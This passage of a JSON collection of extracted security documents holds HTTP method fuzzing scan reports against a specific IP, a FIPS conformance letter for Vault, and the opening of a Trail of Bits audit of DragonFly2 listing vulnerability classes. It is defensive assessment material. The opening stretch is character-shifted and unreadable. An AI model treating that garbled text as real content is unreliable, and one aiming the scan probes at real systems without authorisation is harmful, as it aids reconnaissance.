name]TQFDTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFMFDUPSNBUDI-BCFMTLFZ\u001eWBMVFQSPDFTT\nNBUDI1BUITQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>\nNBUDI%JSFDUPSJFTPXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>EJS\u001b\u0001<BCTPMVUF\u0001EJSFDUPSZ\u0001QBUI>SFDVSTJWF\u001b\u0001<USVF]GBMTF>\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001<SFHFY\u0001QBUUFSO>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GJMF\nNBUDI1BUITQBUI\u001b\u0001<BCTPMVUF\u0001GJMF\u0001QBUI>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>\nNBUDI%JSFDUPSJFT\nPXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>EJS\u001b\u0001<BCTPMVUF\u0001EJSFDUPSZ\u0001QBUI>SFDVSTJWF\u001b\u0001<USVF]GBMTF>\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001<SFHFY\u0001QBUUFSO>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^OFUXPSL\nNBUDI1SPUPDPMTQSPUPDPM\u001b\u0001\\\u0001UDQ\u0001]\u0001VEQ\u0001]\u0001JDNQ\u0001^GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>DBQBCJMJUJFT\nNBUDI$BQBCJMJUJFTDBQBCJMJUZ\u001b\u0001\\\u0001OFU@SBX\u0001^GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"MMPX\u0001]\u0001\"VEJU\u0001]\u0001#MPDL^\nList\nList\nListList\nList\nListListListOptional\nOptional\nOptional\nOptionalOptionalOptionalOptionalOptionalOptionalOptional\nOptionalOptionalMandatoryMandatory\nMandatory if these are not de\ufb01ned in each ruleKubeArmorPolicy Spec Diagram\nListListListList\nListList" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-14 18_25_49.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 2/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 18:25:49\nTime taken 00:00:08.390\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Key Management", - "project_name": "Vault", - "file_name": "Vault_Compliance_Letter_signed.pdf" - }, - "content": [ - { - "data": " \n6841 Benjamin Franklin Drive / Columbia, MD 21046 / tel: 443.367.7389 / fax: 443.367.7970 leidos.com November 8 , 2017 \n \nHashiCorp \n101 2nd St #575 \nSan Francisco, CA \n94105 \n \nTo Whom It May Concern: \n \nLeidos completed its conformance review of the HashiC orp Vault v0. 9.0-beta1 (the \u201cProduct\u201d) on November 8 , \n2017; and has found that the Product faithfully integrates the following FIPS 140 -2 approved cryptographic \nmodule: \n \n1. Luna\u00ae PCI -E Cryptographic Module and Luna\u00ae PCI -E Cryptographic Module for Luna\u00ae SA (FIPS 140 -2 \nCert. #2427) . This will be referred to as the \u201cIntegrated Cryptographic Module\u201d throughout the \nremainder of this document. \n \nSpecifically, under the following assumptions: \n \n1. The Integrated Cryptographic Module is initialized in a manner that is compliant with its Security Policy. \n \n2. The Product is configured to use the Integrated C ryptographic Module via a \u2018seal\u2019 block specifying a seal \ntype of \u2018pkcs11\u2019 in the Product\u2019s configuration file. \n \nLeidos\u2019 review confirmed that: \n \n1. All cryptographic operations for encryption, decryption, message authentication code generation , \nmessage authentication code verification, and cryptographic key generation used in seal wrapping and \nunwrapping are offloaded to the Integrated Cryptographic Module . Secrets protected by seal wrapping \nare protected by encryption and message authentication codes in a fashion that is compliant to the FIPS \n140-2 guidance for both Key Storage (as per FIPS 140 -2 IG 7.16) and Key Transport (as per FIPS 140 -2 \nIG D.9). \n \n2. Secrets and paths designated as \u201cAlways Seal Wrap\u201d in the Product are protected using the Integrated \nCryptographic Module for seal wrapping . The secrets and paths designated as \u201cAlways Seal Wrap\u201d in the \nProduct include the following : \n \na. The Keyr ing (core/keyring) \nb. The Keyring Update Entry Path ( All files under core/upgrade/) \nc. The Master Key (core/master) \nd. The Recovery Key (core/recovery -key) \ne. Stored Barrier Keys (core/hsm/barrier -unseal -keys) \nf. Replication Token Generation Key (core/wrapping/jwtkey) \ng. Cluster Information ( core/cluster/local/info ) \nh. Replicated Cluster Information Path ( All files under core/cluster/replicated/) \ni. Replicated Cluster Information Path for Disaster Recovery ( All files under core/cluster/replicated -\ndr/) \nj. Multi-Factor Authentication TOTP Keys Path ( All files under sys/mfa/totp keys/ ) \n \n3. When a backend is configured with seal wrapping enabled with the Product, all Keys and Critical Security \nParameters written to the backend are protected using the Integrated Cryptographic Module for seal \nwrapping . The Keys and Critical Security Parameters covered by seal wrapping include: \n \n6841 Benjamin Franklin Drive / Columbia, MD 21046 / tel: 443.367.7389 / fax: 443.367.7970 leidos.com a. The CA Key (config/ca_bundle) used in the PKI secret backend \nb. The Keys (policy/) and Key Archives (archive/) used in the Transit secret backend \nc. The CA Key ( ca_private_key , config /ca_private_key ) and generated SSH RSA Keys (keys/) used \nin the SSH secret backend \nd. The Keys (key/) used in the TOTP secret backend \ne. All Storage Entries used in the KV backend \nf. AWS Access Keys (config/client) used in the AWS authentication backend \ng. LDAP Creden tials (config) used in the LDAP authentication backend \nh. Okta Credentials (config) used in the Okta authentication backend \ni. RADIUS Credentials (config) used in the RADIUS authentication backend \nj. AWS Root Credentials (config/root) used in the AWS secret backend \nk. Cassandra Credentials (config/connection) used in the Cassandra secret backend \nl. Consul Credentials (config/access) used in the Consul secret backend \nm. Database Credentials (config/*) used in the plugin -based Database secret backend \nn. MongoDB Credentials (confi g/connection) used in the MongoDB secret backend \no. MSSQL Credentials (config/connection) used in the MSSQL secret backend \np. MySQL Credentials (config/connection) used in the MySQL secret backend \nq. PostgreSQL Credentials (config/connection) used in the PostgreSQL secret backend \nr. RabbitMQ Credentials (config/connection) used in the RabbitMQ secret backend \n \n4. The Product will not operate if the Integrated Cryptographic Module is missing or altered. \n \nDetails of Leidos\u2019 review, which consisted of source code review and operational testing, are obtainable by special \nrequest. \n \nPlease note that for this review, Leidos only examined the Product features referenced above and while the \nProduct may contain other features or functionality, Leidos did not examine these during its review and makes no \nclaims or representations regarding them. Furthermore, the Cryptographic Module Validation Program (CMVP) \nhas not independently reviewed Leidos\u2019 analysis, testing, or results. \n \nThe intention of this letter is to provide independent op inion that the Product correctly integrates and uses \nvalidated cryptographic modules within the scope of claims indicated above. Leidos offers no warranties or \nguarantees with respect to the above described compliance review. This letter does not imply a Leidos \ncertification or product endorsement. \nPlease let us know if you have any questions. \n \nSincerely, \n \nJason Tseng \nLeidos Cryptographic and Security Testing Laboratory (CSTL) Lab Manager \n" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-19 22_07_32.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin REST Project 2/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 22:07:32\nTime taken 00:05:00.695\nTotal scans performed: 2189\nIssues found: 3\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 3 3\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest HEAD https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest POST https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod POST\nResponseContent-type: application/json\n535 Content length: \nFull response:\n{\"data\":{\"siddharth-8vcpu-agent\":{\"containers\":{},\"kubernetes_cluster_name\n\":\"\",\"pod_id_to_ip\":{},\"pod_scope_id\":{},\"pods\":{},\"probe_id\":\"\n3c6bb1217b3b2388\",\"severity\":null},\"siddharth-8vcpu-console\":{\"containers\"\n:{},\"kubernetes_cluster_name\":\"\",\"pod_id_to_ip\":{},\"pod_scope_id\":{},\"pods\n\":{},\"probe_id\":\"35ccbb56f0e12a5d\",\"severity\":null},\"siddharth-dev-\n8vcpu-agent3\":{\"containers\":{},\"kubernetes_cluster_name\":\"\",\"pod_id_to_ip\"\n:{},\"pod_scope_id\":{},\"pods\":{},\"probe_id\":\"7726d7c69133fbc2\",\"severity\":\nnull}},\"error\":null,\"success\":true}\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #3" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Container Registry", - "project_name": "Dragonfly", - "file_name": "dragonfly-comprehensive-report-2023.pdf" - }, - "content": [ - { - "data": " DragonFl y2 \n Security Assessment \n September 14, 2023 \n Prepared for: \n Gaius Qi \n DragonFly2 \n Organized by the Open Source Technology Improvement Fund, Inc. \n Prepared by: Pawe\u0142 P\u0142atek and Sam Alws \n About Trail of Bits \n Founded in 2012 and headquartered in New York, Trail of Bits provides technical security \n assessment and advisory services to some of the world\u2019s most targeted organizations. We \n combine high- end security research with a real -world attacker mentality to reduce risk and \n fortify code. With 100+ employees around the globe, we\u2019ve helped secure critical software \n elem ents that support billions of end users, including Kubernetes and the Linux kernel. \n We maintain an exhaustive list of publications at https://github.com/trailofbits/publications , \n with links to papers, presentations, public audit reports, and podcast appearances. \n In recent years, Trail of Bits consultants have showcased cutting-edge research through \n presentations at CanSecWest, HCSS, Devcon, Empire Hacking, GrrCon, LangSec, NorthSec, \n the O\u2019Reilly Security Conference, PyCon, REcon, Security BSides, and SummerCon. \n We specialize in software testing and code review projects, supporting client organizations \n in the technology, defense, and \ufb01nance industries, as well as government entities. Notable \n clients include HashiCorp, Google, Microsoft, Western Digital, and Zoom. \n Trail of Bits also operates a center of excellence with regard to blockchain security. Notable \n projects include audits of Algorand, Bitcoin SV, Chainlink, Compound, Ethereum 2.0, \n MakerDAO, Matic, Uniswap, Web3, and Zcash. \n To keep up to date with our latest news and announcements, please follow @trailofbits on \n Twitter and explore our public repositories at https://github.com/trailofbits . To engage us \n directly, visit our \u201cContact\u201d page at https://www.trailofbits.com/contact , or email us at \n info@trailofbits.com . \n Trail of Bits, Inc. \n 228 Park Ave S #80688 \n New York, NY 10003 \n https://www.trailofbits.com \n info@trailofbits.com \n Trail of Bits 1 DragonFly2 Security Assessment \n P U B L I C \n Notices and Remarks \n Copyright and Distribution \n \u00a9 2023 by Trail of Bits, Inc. \n All rights reserved. Trail of Bits hereby asserts its right to be identi\ufb01ed as the creator of this \n report in the United Kingdom. \n This report is considered by Trail of Bits to be public information; it is licensed to OSTIF \n under the terms of the project statement of work and has been made public at OSTIF\u2019s \n request. Material within this report may not be reproduced or distributed in part or in \n whole without the express written permission of Trail of Bits. \n The sole canonical source for Trail of Bits publications is the Trail of Bits Publications page . \n Reports accessed through any source other than that page may have been modi\ufb01ed and \n should not be considered authentic. \n Test Coverage Disclaimer \n All activities undertaken by Trail of Bits in association with this project were performed in \n accordance with a statement of work and agreed upon project plan. \n Security assessment projects are time-boxed and often reliant on information that may be \n provided by a client, its a\ufb03liates, or its partners. As a result, the \ufb01ndings documented in \n this report should not be considered a comprehensive list of security issues, \ufb02aws, or \n defects in the target system or codebase. \n Trail of Bits uses automated testing techniques to rapidly test the controls and security \n properties of software. These techniques augment our manual security review work, but \n each has its limitations: for example, a tool may not generate a random edge case that \n violates a property or may not fully complete its analysis during the allotted time. Their use \n is also limited by the time and resource constraints of a project. \n Trail of Bits 2 DragonFly2 Security Assessment \n P U B L I C \n Table of Contents \n About Trail of Bits 1 \n Notices and Remarks 2 \n Table of Contents 3 \n Executive Summary 5 \n Project Summary 8 \n Project Goals 9 \n Project Targets 10 \n Project Coverage 11 \n Automated Testing 12 \n Codebase Maturity Evaluation 13 \n Summary of Findings 19 \n Detailed Findings 21 \n 1. Authentication is not enabled for some Manager\u2019s endpoints 21 \n 2. Server-side request forgery vulnerabilities 23 \n 3. Manager makes requests to external endpoints with disabled TLS authentication \n 26 \n 4. Incorrect handling of a task structure\u2019s usedTra\ufb03c \ufb01eld 28 \n 5. Directories created via os.MkdirAll are not checked for permissions 29 \n 6. Slicing operations with hard-coded indexes and without explicit length validation \n 30 \n 7. Files are closed without error check 32 \n 8. Timing attacks against Proxy\u2019s basic authentication are possible 34 \n 9. Possible panics due to nil pointer dereference when using variables created \n alongside an error 35 \n 10. TrimLeft is used instead of TrimPre\ufb01x 37 \n 11. Vertex.DeleteInEdges and Vertex.DeleteOutEdges functions are not thread safe \n 39 \n 12. Arbitrary \ufb01le read and write on a peer machine 41 \n 13. Manager generates mTLS certi\ufb01cates for arbitrary IP addresses 44 \n 14. gRPC requests are weakly validated 46 \n 15. Weak integrity checks for downloaded \ufb01les 48 \n 16. Invalid error handling, missing return statement 51 \n 17. Tiny \ufb01le download uses hard coded HTTP protocol 53 \n 18. Incorrect log message 54 \n Trail of Bits 3 DragonFly2 Security Assessment \n P U B L I C \n 19. Usage of architecture-dependent int type 56 \n A. Vulnerability Categories 57 \n B. Code Maturity Categories 59 \n C. Code Quality Issues 61 \n D. Automated Static Analysis 66 \n E. Automated Dynamic Analysis 68 \n F. Fix Review Results 72 \n Detailed Fix Review Results 74 \n G. Fix Review Status Categories 77 \n Trail of Bits 4 DragonFly2 Security Assessment \n P U B L I C \n Executive Summary \n Engagement Overview \n OSTIF engaged Trail of Bits to review the security of DragonFly2, a peer-to-peer \ufb01le \n distribution system. \n A team of two consultants conducted the review from July 10, 2023 to July 21, 2023, for a \n total of four engineer-weeks of e\ufb00ort. Our testing e\ufb00orts focused on potential privilege \n escalation and denial-of-service attacks. With full access to source code and \n documentation, we performed static and dynamic testing of the DragonFly2 codebase, \n using automated and manual processes. \n Observations and Impact \n The security review discovered numerous low-level vulnerabilities that could have been \n caught with more robust tests and static analysis (e.g., TOB-DF2-3 , TOB-DF2-7 , TOB-DF2-9 ). \n A few vulnerabilities manifest serious issues in the system\u2019s design. Examples include the \n ability of remote peers to manipulate other peers\u2019 \ufb01lesystems ( TOB-DF2-12 ), which may \n result in remote code execution, and weak integrity veri\ufb01cation of \ufb01les and images shared \n in the network ( TOB-DF2-15 ). Moreover, dozens of features seem not to be fully \n implemented, which leads to critical vulnerabilities (e.g., TOB-DF2-13 ). \n Recommendations \n Based on the codebase maturity evaluation and \ufb01ndings identi\ufb01ed during the security \n review, Trail of Bits recommends that the DragonFly2 developers take the following steps: \n \u25cf Remediate the \ufb01ndings disclosed in this report. These \ufb01ndings should be \n addressed as part of a direct remediation or as part of any refactor that may occur \n when addressing other recommendations. \n \u25cf Perform a threat modeling exercise. For every component in the system, \n enumerate all entrypoints and decide where to lay trust boundaries. From there, \n research risks related to using data from potentially malicious, external parties. The \n exercise should detect and \ufb01nd mitigations for issues like TOB-DF2-15 . Moreover, it \n should be accompanied by cryptographic protocol review, as the DragonFly2 system \n implements a Public Key Infrastructure architecture that is hard to implement \n securely. \n \u25cf Redesign the \ufb01le handling mechanism in peers. Currently, remote peers can fully \n control other peers\u2019 \ufb01lesystems. DragonFly2 should \u201csandbox\u201d peers\u2019 \ufb01lesystems so \n that only a limited subset of the \ufb01lesystem is used. \n Trail of Bits 5 DragonFly2 Security Assessment \n P U B L I C \n \u25cf Remove support for the MD5 hashing algorithm. It does not provide any bene\ufb01ts \n over more secure algorithms like SHA256 or SHA3, and is not collision-resistant. The \n MD5 should not be supported, even optionally, to avoid downgrade attacks. \n \u25cf Review implementations of low-level networking functionalities (e.g., HTTP \n proxy, HTTP header parsing) against standards and known attacks like request \n smuggling, parsing discrepancies, and mishandling of custom HTTP headers. In \n particular, establish trust assumptions around the Proxy component, and review \n relevant attack vectors to ensure that the component does not compromise the \n whole system's security. \n \u25cf Finish implementation of DragonFly2. There are numerous TODO and FIXME \n comments in the whole codebase. Even security-critical features are currently not \n yet implemented, leaving the system in a state of ambiguous security guarantees. \n \u25cf Advance static analysis used in the continuous integration (CI) pipeline. \n Currently, only CodeQL with default build settings and the default ruleset is used. \n The build settings may need adjustment so that the generated CodeQL database is \n complete, as building the DragonFly2 is a complex task. Adding tools like Semgrep \n and golangci-lint should follow. \n The following tables provide the number of \ufb01ndings by severity and category. \n Trail of Bits 6 DragonFly2 Security Assessment \n P U B L I C \n EXPOSURE ANALYSIS \n Severity Count \n High 5 \n Medium 